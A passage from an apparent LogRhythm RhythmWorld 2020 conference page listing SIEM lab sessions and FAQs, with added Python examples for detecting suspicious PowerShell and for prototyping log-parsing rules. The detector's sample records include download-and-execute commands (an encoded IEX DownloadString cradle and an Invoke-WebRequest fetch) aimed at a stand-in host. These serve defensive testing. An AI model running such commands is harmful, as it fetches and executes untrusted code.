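    except (ValueError, UnicodeDecodeError):
        return ""


def score_command(cmdline: str):
    """Score one command line, also scanning the decoded -enc payload.
    Each indicator counts once even if it appears in both texts."""
    texts = [cmdline]
    m = ENC_ARG.search(cmdline)
    if m:
        decoded = decode_ps(m.group(1))
        if decoded:
            texts.append(decoded)
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if any(re.search(pattern, t, re.I) for t in texts):
            score += weight
            reasons.append(label)
    return score, reasons


def evaluate(record):
    """Return an alarm dict for a record, or None when it is noise."""
    parent = record["parent"].lower()
    if parent in TRUSTED_PARENTS:
        return None  # suppressed: known administrative automation
    score, reasons = score_command(record["cmdline"])
    if parent.rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        score += 3
        reasons.append("office parent")
    if score >= ALARM_THRESHOLD:
        return {"host": record["host"], "user": record["user"],
                "score": score, "reasons": reasons}
    return None


def run(records):
    """Alarms for a batch of records, in input order."""
    return [a for a in (evaluate(r) for r in records) if a]


PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_RECORDS = [  # constructed for this example
    {"host": "fs01", "user": "CORP\\backupsvc", "parent": r"c:\windows\system32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\Backup.ps1"},
    {"host": "ws17", "user": "NT AUTHORITY\\SYSTEM", "parent": r"c:\windows\ccm\ccmexec.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\Windows\CCM\Inventory.ps1"},
    {"host": "ws42", "user": "CORP\\jdoe",
     "parent": r"c:\program files\microsoft office\root\office16\winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(PAYLOAD)},
    {"host": "ws08", "user": "CORP\\asmith", "parent": r"c:\windows\explorer.exe",
     "cmdline": "powershell.exe -ep bypass -c 'Invoke-WebRequest http://example.invalid/x -OutFile x.exe'"},
]

if __name__ == "__main__":
    for alarm in run(SAMPLE_RECORDS):
        print(alarm)
```

Of the four records only two alarm: the backup script scores a single point and stays an event, the SCCM-launched script is suppressed by the parent allowlist even though its command line looks aggressive, the Word-spawned encoded download cradle scores highest because the payload is decoded before scoring, and the explicit bypass-plus-download just crosses the threshold. The allowlist and threshold are where the tuning happens in practice; start from your own baseline of what administrators actually run rather than the values assumed here.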
3:00 PM - 4:00 PM MDT
Threat Hunting
Asia Pacific Regional Small Group Discussion
Join a conversation and share best practices with your peers in the Asia Pacific region. This discussion will be facilitated by Professional Services consultant Brian Holt and Customer Success Manager Michael Hubbard.
Attendance is capped at 30 customer attendees and will be managed on a first-come, first-served basis.
9:00 PM - 10:00 PM MDT
Asia Pacific Hands-on Labs Help
10:00 PM - 11:00 PM MDT
Europe Regional Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first-come, first-served basis.
3:00 AM - 4:00 AM MDT
European Hands-on Labs Help
4:00 AM - 5:00 AM MDT
LogWars Capture the Flag (CTF) Challenge
8:00 AM – 9:30 AM MDT
Hands-on Labs Help
10:00 AM - 11:00 AM MDT
Tail in Web and Search Improvements
Basic Threat Hunting – Using FIM to Detect Unauthorized Access
Your company is concerned about unauthorized access to financial files. To help combat the potential threat, your SOC team created a LogRhythm File Integrity Monitoring (FIM) policy to monitor for unauthorized access. With the FIM policy in place you now must continue to monitor activity and investigate users attempting to access unauthorized areas.
In this lab, you will:
- Investigate activity related to a FIM policy
- Determine who maliciously accessed the monitored documents
- Create a Case to document your findings
- Uncover all actions the nefarious user took and preserve evidence in the case
Life of a Case – SOC 101
An AI Engine alarm has been triggered for multiple password changes by an admin. These changes could potentially be used as future backdoors or to prevent the affected users from logging in to systems.
In this lab you will:
- Review the alarm and details
- Open a case
- Add associated evidence to case
- Assign a collaborator
- Close case
- Review case metrics
Building Dashboards and Drilldown Layouts
Set up a new dashboard built around data classifications, separating Audit, Security, and Operations data into their own widgets. Use a 3 x 3 widget layout and also build a targeted drilldown widget.
In this lab you will:
- Build a dashboard
- Set up and customize widgets
- Set up a targeted drilldown through a custom widget
Building AI Engine Rules
Getting Started with and Building Kibana Dashboards
Kibana allows you to visualize data in any form you wish: build custom visualizations and dashboards, and run your own searches and investigations against data held in LogRhythm’s Data Indexer (DX).
In this lab, you will:
- Perform Basic Search in Kibana
- Search using Lucene Syntax
- Build Visualizations
- Build a Dashboard
Add Kibana to Your LogRhythm XM
Follow the installation process for adding Kibana to your LogRhythm instance. At the end of the lab, you will be able to set up Kibana and create your first “it’s working” dashboard.
In this lab you will:
- Download the correct Kibana version
- Install and configure Kibana
- View LogRhythm data in Kibana
Open Collector Labs: 101, 202, 303
Open Collector 101 – Deploy an Open Collector
In this section, you’ll deploy the LogRhythm Open Collector and connect it to your SIEM environment.
Open Collector 202 – Import Community Device Support
In this section, you’ll use your setup from Open Collector 101 to import device support created by the LogRhythm Community into your Open Collector.
Open Collector 303 – Create Device Support
In this section, you’ll use your setup from Open Collector 101 and 202 to configure Filebeat, then write your own JSON parsing with jq to get normalized logs into the SIEM.
Building and Using Contextualization Actions
A security analyst uses many tools to triage alarms and perform research. Contextualize Actions speed up looking up LogRhythm metadata in third-party tools. Learn how to create, deploy, and configure new web Contextualize Actions.
In this lab you will:
- Create a Contextualize Action to look up IP Addresses in ARIN (American Registry for Internet Numbers)
- Create a Contextualize Action to look up Windows Event IDs in Ultimate Windows Security
- Understand the settings available in Contextualize Actions
Building SmartResponse Plugins
As a SOC team member, you are concerned with responding to threats promptly so that damage can be prevented or minimized. You want to create a SmartResponse that logs users off a host. Learn how to create a simple SmartResponse plugin (SRP) from scratch. You will practice writing the wrapper, creating the payload, and deploying the plugin.
In this lab you will:
- Review the PowerShell script
- Create the SmartResponse plugin (SRP) XML wrapper
- Import your SmartResponse
- Test your SmartResponse
LogRhythm API 101
This lab will guide you through connecting to the LogRhythm API, performing some test requests, and creating a script to interface with the API.
This is achieved through the following steps:
- Install Postman
- Postman Setup
- Set up LogRhythm for API Access
- Test Requests in Postman
- Generate a Python code sample using Postman
- Create a custom Python script using the code sample
Getting Started with ECHO
Ever set up a new AI Engine alarm and wondered if it will fire? In this lab, learn how to use the LogRhythm Echo tool to generate logs that can be used to validate a functional SIEM as well as test alarms.
In this lab you will:
- Log into Echo
- Browse for use cases
- Fire the use case
- Check out the alarm in the Web Console
Basic Log Source Lifecycle
Log source management is a key administrative task in any LogRhythm environment. As an administrator, you will spend a lot of time managing your log sources. In this lab, you will practice the key tasks necessary to get data flowing into LogRhythm!
Specifically you will:
- Configure a new log source
- Accept the log source and verify that data is being received
- Upgrade the agent used to collect the log source
- Retire the log source
Log Source Troubleshooting and Tuning
In this lab you will:
- Set up Silent Log Source Detection
- Troubleshoot a Log that’s not collecting
- Create a GLPR from Investigation Results
- Adjust Classification Based Data Management Settings
Advanced Log Source Data Management
An essential part of tuning the SIEM involves overriding the default behavior of the Message Processing Engine (MPE). LogRhythm provides Administrators with several tools to achieve the desired results. The most common are Global Log Processing Rules (GLPRs) and the Classification Based Data Management system.
In this lab you will:
- Create a GLPR
- Create a GLPR from Investigation Results
- Adjust Classification Based Data Management Settings
- Tune Events
- Filter Logs at the System Monitor Agent
Getting Started with LogRhythm Phishing Intelligence Engine (PIE)
How does a SOC respond to a phishing message? By monitoring message tracking logs in Exchange or Office 365, getting phishing email reports into LogRhythm can be quick and fully automated, and an alarm can tell an analyst when a report arrives and kick off the corresponding investigation in LogRhythm.
In this lab, you will import an Office 365 dashboard, simulate Office 365 log ingestion, and create an alarm that fires when a phishing email is reported.
How to Utilize Playbooks
Playbooks are a powerful tool to further enable your SOC. In this lab, you will empower your SOC analysts by creating a playbook. You will also configure the Case SmartResponse Plugin to automatically attach the playbook to specific types of cases. Finally, you will set up a dashboard to monitor metrics around case statuses.
In this lab you will:
- Create a playbook
- Attach a playbook to a case
- Use SmartResponse to automatically add a playbook to a case
- Set up a case metrics dashboard
Tuning AI Engine Rules
Monitoring Your Deployment
LogRhythm has multiple built-in reports and monitoring tools that can help an Administrator determine the overall utilization of the platform and whether it is healthy. This lab will demonstrate how to utilize these tools to maintain overall health and get the most out of your LogRhythm deployment.
In this lab you will:
- Set up built-in automated reports using Report Center
- Use the Deployment Monitor
- Use the LogRhythm Diagnostics Tool
Getting Started with the LogRhythm.Tools PowerShell Module
Interacting and integrating services through REST APIs can be a challenge. LogRhythm.Tools, a Windows PowerShell module, has been developed to expand the accessibility of LogRhythm’s RESTful APIs. Through this lab you will step through some of the capabilities of this toolkit to learn how you can interact, integrate, and expand your use of LogRhythm.
In this lab you will:
- Use a new, easier way to integrate with the LogRhythm APIs
- Create, modify, and customize LogRhythm Lists
- Trigger a LogRhythm Echo use case
- Initiate a LogRhythm SmartResponse that utilizes LogRhythm.Tools
Onboarding a New Log Source
You have been asked to bring on a log source that is not currently supported in LogRhythm’s Knowledge Base (e.g., a custom, proprietary log source or a new product that’s not yet supported). In this lab, you will live the life of a LogRhythm administrator who is tasked with bringing on a new, unsupported log source.
In this lab you will:
- Create a new log source
- Write a quick MPE rule to begin parsing the data
- Create a new log processing policy
- Add the new MPE rule to the new processing policy
- Assign the new policy to the new log source
- Begin parsing the data
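A way to prototype the MPE rule and check it against real samples before the policy goes live, as an added example that is not LogRhythm's rule syntax or tooling: each rule is an anchored regular expression whose named groups stand in for the metadata fields the MPE rule would populate, rules are tried in policy order with the first match winning, and the coverage report shows which sample lines would still arrive in the SIEM unidentified. The "vaultapp" product, its log format, the field names and the sample lines are assumptions constructed for this example.

```python
"""Added example (not LogRhythm code): prototyping MPE-style parsing
rules for an unsupported log source.

Named groups (login, sip, command, object, result, ...) stand in for the
metadata fields a LogRhythm MPE rule would populate; the product,
format, field names and samples are constructed for this example.
"""
import re

# Ordered like a log processing policy: the first matching rule wins,
# so put the most specific rules first. Every rule is anchored with
# ^ and $ so a partial match cannot mis-tag a different event type.
POLICY = [
    ("vaultapp file access", re.compile(
        r"^(?P<ts>\S+) vaultapp\[(?P<pid>\d+)\]: ACCESS user=(?P<login>\S+) "
        r"src=(?P<sip>\d{1,3}(?:\.\d{1,3}){3}) action=(?P<command>\S+) "
        r"object=(?P<object>\S+) result=(?P<result>ALLOW|DENY)$")),
    ("vaultapp authentication", re.compile(
        r"^(?P<ts>\S+) vaultapp\[(?P<pid>\d+)\]: AUTH user=(?P<login>\S+) "
        r"src=(?P<sip>\d{1,3}(?:\.\d{1,3}){3}) action=LOGIN "
        r"result=(?P<result>OK|FAIL)(?: reason=(?P<reason>\S+))?$")),
]


def parse_line(line):
    """Return (rule_name, fields) for the first rule that matches, or
    (None, {}) when the line would land in the SIEM as unidentified."""
    for name, rx in POLICY:
        m = rx.match(line)
        if m:
            fields = {k: v for k, v in m.groupdict().items() if v is not None}
            return name, fields
    return None, {}


def check_policy(lines):
    """Coverage report for a batch of sample lines: hits per rule, the
    parsed fields, and the lines that fell through every rule."""
    hits = {name: 0 for name, _ in POLICY}
    parsed, unparsed = [], []
    for line in lines:
        name, fields = parse_line(line)
        if name is None:
            unparsed.append(line)
        else:
            hits[name] += 1
            parsed.append(fields)
    return {"hits": hits, "parsed": parsed, "unparsed": unparsed}


SAMPLE_LINES = [  # constructed for this example
    "2020-09-15T14:02:11Z vaultapp[2231]: AUTH user=jdoe src=10.20.30.40 action=LOGIN result=FAIL reason=badpass",
    "2020-09-15T14:02:13Z vaultapp[2231]: AUTH user=jdoe src=10.20.30.40 action=LOGIN result=OK",
    "2020-09-15T14:02:19Z vaultapp[2231]: ACCESS user=jdoe src=10.20.30.40 action=DOWNLOAD object=/finance/q3-forecast.xlsx result=ALLOW",
    "2020-09-15T14:02:20Z vaultapp[2231]: HEARTBEAT uptime=3600",
]

if __name__ == "__main__":
    report = check_policy(SAMPLE_LINES)
    print("hits:", report["hits"])
    for fields in report["parsed"]:
        print("parsed:", fields)
    for line in report["unparsed"]:
        print("UNPARSED:", line)
```

Run against a representative capture from the device, not just the lines the vendor documentation shows: the heartbeat line above is exactly the kind of message that turns up only in production and, left unmatched, shows up as unidentified logs after the policy is assigned. Adding a catch-all rule for it, or deciding to drop it, is a choice to make before you begin parsing the live data rather than after.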
Intro to Threat Hunting – SOC 202
Your SOC team is concerned the company’s financial information may be at risk. You create a LogRhythm File Integrity Monitoring (FIM) policy that monitors files in the F:\Finance directory on a honeypot server. The FIM policy name is FinanceDataFIM.
In this lab, you will gain hands on experience in many of the techniques used by the best LogRhythm threat hunters. You will explore how to identify, qualify and investigate potential threats using the Web Console.
In this lab you will:
- Review the results of your financial data file monitoring
- Determine who was accessing the documents
- Find other actions the nefarious user took
- Find where the documents were sent
- Create a Case to document your findings
SmartResponse Plugin VirusTotal v2.1
As an Administrator, you are monitoring the LogRhythm Web Console and observe that a number of alarms are triggering on specific IPs, URLs, and domains. You want to be able to determine, from within the LogRhythm Web Console UI, where this malicious content is coming from, for follow-up action.
In this lab you will install, configure, and execute the VirusTotal SRP to create the following reports:
- Get Domain Report
- Get IP Report
- Get URL Report
Frequently Asked Questions (FAQs)
Why did RhythmWorld shift to a virtual event?
We are facing a truly unprecedented situation. The coronavirus pandemic has affected all our families, our businesses, our communities, and our way of life. To ensure the safety of our customers, partners, and employees we have chosen to move RhythmWorld to a virtual event. We hope that a free virtual experience will provide opportunities for our global network to learn, grow, and engage.
What is the cost to attend RhythmWorld 2020?
What technology will be required to participate in the virtual RhythmWorld?
The digital security conference will be web-based. All you need to participate is your computer and a reliable internet connection.
I’ve already registered for RhythmWorld 2020 in Denver. Will I be refunded for the in-person event?
Will I be refunded for my lost travel and accommodation costs?
Will RhythmWorld 2020 include a LogWars Capture the Flag (CTF) event?
We are planning to host an epic virtual LogWars CTF as part of RhythmWorld 2020. Details about how to register and participate will be provided closer to the event.